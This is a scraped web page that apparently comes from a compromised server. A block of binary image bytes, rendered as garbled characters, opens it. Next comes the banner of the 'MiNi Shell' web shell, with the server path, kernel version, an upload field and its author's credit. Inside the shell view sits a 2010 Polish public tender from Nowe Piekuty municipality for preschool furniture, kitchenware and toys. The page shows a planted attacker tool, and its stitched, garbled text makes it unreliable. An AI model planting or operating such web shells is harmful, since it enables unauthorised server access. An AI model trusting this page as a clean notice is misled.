JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101014/331840-N-2010.html

<p class="kh_header"><b>Nowe Piekuty: wyposażenie punktów przedszkolnych w Nowych Piekutach i Jabłoni Kościelnej.</b><br>
<b>Numer ogłoszenia: 331840 - 2010; data zamieszczenia: 14.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Nowe Piekuty , ul. Główna 8, 18-212 Nowe Piekuty, woj. podlaskie, tel. 086 4761520, faks 086 4761522.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wyposażenie punktów przedszkolnych w Nowych Piekutach i Jabłoni Kościelnej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia jest: 
Wykaz sprzętu
Lp	Nazwa	Ilość 	Cena jednostkowa	Suma
1	Tablica tryptyk zielona (pojedyncza) do pisania kredą  	2		
2	Tablica korkowa z ramą aluminiową (100x200)  	4		
3	Tablica korkowa z ramą aluminiową (150x90)  	2		
4	Stolik drewniany (65x65), wys. 70	2		
5	Krzesło tapicerowane	4		
6	Zmywarka uniwersalna ze stali nierdzewnej z funkcją wyparzania + kosz do talerzy, kosz uniwersalny i kosz na sztućce (58x61x84)	2		
7	Szafa przelotowa z drzwiami suwanymi, wbudowana pomiędzy dwoma pomieszczeniami  (80x50x180)
	1		
8	Szafa przelotowa z drzwiami suwanymi, wbudowana pomiędzy dwoma pomieszczeniami  (75x50x180)
	1		
9	Chłodziarka w obudowie biała (60x60x85), poj. 130 l.	2		
10	Stół ze stali nierdzewnej przyścienny z drzwiami suwanymi 80x60x85  	2		
11	Szafa magazynowa ze stali nierdzewnej(3 przestawne półki) 80x50x180	2		
12	Termos UPCS-180 (szary)	4		
13	Pojemnik gastronomiczny GN-O ? 200 z rączkami + pokrywki z uszczelką silikonową do pojemników	2		
14	Pojemnik gastronomiczny GN-O 1/1 200 z rączkami + pokrywki z uszczelką silikonową do pojemników	2		
15	Talerz głęboki  Arcoroc	80		
16	Talerz płytki  	80		
17	Talerz deserowy	80		
18	Kubek z uchem  	80		
19	Widelec stołowy	80		
20	Nóż stołowy	80		
21	Łyżka stołowy	80		
22	Łyżeczka  stołowa	80		
23	Chochla (przekrój 9, dł. 32)	2		
24	Łyżka do serwowania (dł. 34,5)	2		
25	Widelec do serwowania (dł. 37)	2		
26	Nóż ze stali walcowanej kuchenny 20	2		
27	Nóż ze stali walcowanej do chleba 20	2		
28	Nóż ze stali walcowanej uniwersalny 20	2		
29	Taca prostokątna laminowana antypoślizgowa (50x36)  	2		
30	Koszyk do pieczywa polipropylenowy owalny (37,5x15x7)	4		
31	Deska do krojenia  z polietylenu o grub. 2 cm (44x29)	2		
32	Pojemnik na odpady - kontener z pokrywą uchylną 50l.	2		
33	Czajnik 5-litrowy ze stali nierdzewnej	2		
34	Wiaderka 10-litrowe emaliowane	2		
35	Szafa gospodarcza z drążkiem i przedziałem na półki (49x80x180)	2		
36	Kosz plastikowy na śmieci z pokrywą uchylną poj. 9 l.	8		
37	Kosz uchylny plastikowy 25l. 	4		
38	Dozownik stalowy na mydło  poj. 0,5	4		
39	Dozownik na mydło  plastik biały ABS poj. 1l.	12		
40	Dozowniki na ręczniki papierowe składane plastik biały ABS (max 2 pakiety)	8		
41	Pojemnik na papier toaletowy śr. 20 cm	10		
42	Wieszak łazienkowy (9 haczyków na desce)  	9		
43	Lustro łazienkowe 50x70  rama plastikowa	2		
44	Żaluzje pionowe VERTIKALE 
(wymiary otworów okiennych)
1)	0,97x1,48	

3		
	2)	1,56x1,48
3)	1,57x1,48
4)	0,95x1,48
5)	0,88x1,97
6)	1,45x1,45
7)	207x1,45
8)	232x90	1
1
1
1
7
2
1		
45	Wycieraczka wewnętrzna dywanowa na gumie antypoślizgowa (90x150)	4		
46	Wycieraczka wewnętrzna dywanowa na gumie antypoślizgowa (50x60)	2		
47	Mata gumowa ażurowa zewnętrzna (75x100)	2		
48	Laptop Acer	2		
49	Urządzenie wielofunkcyjne - drukarka HPCLJ	2		
50	Telefax Panasonic  KX-FC228PD-T 
2		
51	Telewizor TV LCD LG 26LD350
3		
52	DVD LG DVX582
3		
53	Radiomagnetofon Sony CFD-S05	5		
54	Aparat cyfrowy FUJI FinePix F80 EXR - czarny	2		
55	Torba małego muzyka (torba na zamek z 18 instrumentami)	2		
56	Kształty podstawowe - nakładanka ( z drewna, 10 trzpieni, 16 figur. Wymiar podstawowy 14,5x15)	4		
57	Piramida 10 (trójkąt o boku 27 cm; 11 elementów)	4		
58	Piramida (10x10; wys. 14,5; 8 szt.)	2		
59	Klaun - piramida (wys. 15 cm.; 6 elementów)	3		
60	Puzzle z pianki - literki i cyferki (26 liter od A do Z; 10 cyfr od 0-9; wym. 17x17)	4		
61	Drewniane klocki kolorowe (50 szt.; wym. Od 3,2x3,2x1,6 do 10x3,2x3,2)	5		
62	Drewniane klocki naturalne (50 szt. wym. od 3,3x3,3x1,6 do 10x3,3x3,3)	4		
63	Klocki płatki śniegu (90 szt. 5 kolorów, śr. 1 elementu-6 cm.)	5		
64	Kącik lekarski - 17 elementów (44x30x48)	3		
65	Lalka mój dzidziuś mówi + akcesoria (lalka mówi tata, mama, płacze; wys. 30 cm.	5		
66	Lalka śpiący bobas- wys. 30 cm.	6		
67	Lalka Agatka + ubranka. Wys. 20 cm	8		
68	Kołyska dla lalek z drewna. Wym. 33x30x50	5		
69	Wózek dla lalek Bartek - spacerowy na podwójnych kołach. Wys. 69 cm.	5		
70	Wózek wielofunkcyjny dla lalki - w komplecie nosidło z uszami, spacerówka, torba na wózek, 	4		
71	Miś Bruno dł. 24 cm	5		
72	Zwierzaki Przytulanki - poduszeczki w kształcie zwierzątek (27x23 cm)	15		
73	Kuchenka wyposażona w palniki, pokrętła i otwierane drzwiczki (80x33,5x106,5)	3		
74	Taca z naczyniami- zestaw obiadowo-kawowy (51 elementów)	5		
75	Akcesoria kuchenne (5 elementów)	4		
76	Zestaw jedzenia imitacje z tworzywa sztucznego - 48 elementów	4		
77	Wywrotka gigant (samochód ciężarowy o udźwigu 150 kg)	5		
78	Koparka dł. 36 cm	5		
79	Traktor ze zwierzętami (1 kierowca, 5 zwierzątek) wym. 39x15x18	5		
80	Wywrotka dł. 45 cm	4		
81	Straż pożarna 47 cm	4		
82	Jambo policja wym. 25 cm	5		
83	Helikopter wym. 30 cm	5		
84	Traktor gigant z przyczepą o udźwigu 100 kg; dł. 102 cm	3		
85	Chusta animacyjna 3,5m	3		
86	Teatrzyk stragan z drewna i tkaniny (57x117)	3		
87	Pacynki (8 pacynek, płyta Cd, książeczka z dialogami)	3		
88	Taczka dł. 60x24x26	5		
89	Koń na biegunach z uchwytami (86x29x43)	2		
90	Pies na biegunach z uchwytami (83x43x26)	4		
91	Piłka skacząca Hop śr. 45 cm. Wytrzymałość 150 kg	10		
92	Piłka gumowa śr. 30 cm	10		
93	Stemple ze zwierzętami z drewna- 5 szt. wym. 4x6,5	10		
94	Szablony z tworzywa- owoce wym. 13x16	5		
95	Szablony z tworzywa - farma 20x20	5		
96	Szablony z tworzywa - warzywa 13x16	5		
97	Szablony z tworzywa - pojazdy 20x20	5		
98	W zagrodzie	5		
99	Wesoła lokomotywa	5		
100	Makro puzzle	5		
101	Bajki grajki płyta Cd Czerwony kapturek	3		
102	Bajki grajki płyta Cd Kot w butach	3		
103	Bajki grajki płyta Cd Kopciuszek	3		
104	Bajki grajki płyta Cd Śpiąca królewna	3		
105	Bajki grajki płyta Cd Chatka Puchatka	3		
106	Bajki grajki płyta Cd Dziwne przygody Pana Zająca	3		
107	Zwierzęta i natura. Lotto dźwiękowe	3		
108	Tunel Zygzak dł. 280cm, śr. 53 cm	3		
109	Klocki Cliksy w ergonomicznym pojemniku na kółkach- 400 elementów Wym klocków 5x5	5		
110	Kuchenka elektr.	2		
111	Odkurzacz	2		
112	Wieszak stojący ubraniowy	2		
113	Taborety	4.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 20% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.22.00.00-0, 37.22.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 13.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> przystępujący do przetargu wnosi wadium w wysokości 1500 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, - aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
- aktualna informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Pzp, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych w okresie ostatnich trzech lat dostaw lub usług, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugpiekuty.bip.podlaskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Nowe Piekuty, Ulica Główna 8, 18-212 Nowe Piekuty.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2010 godzina 11:00, miejsce: Urząd Gminy Nowe Piekuty, Ulica Główna 8, 18-212 Nowe Piekuty, Pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Europejski Fundusz Społeczny, Program Operacyjny    Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com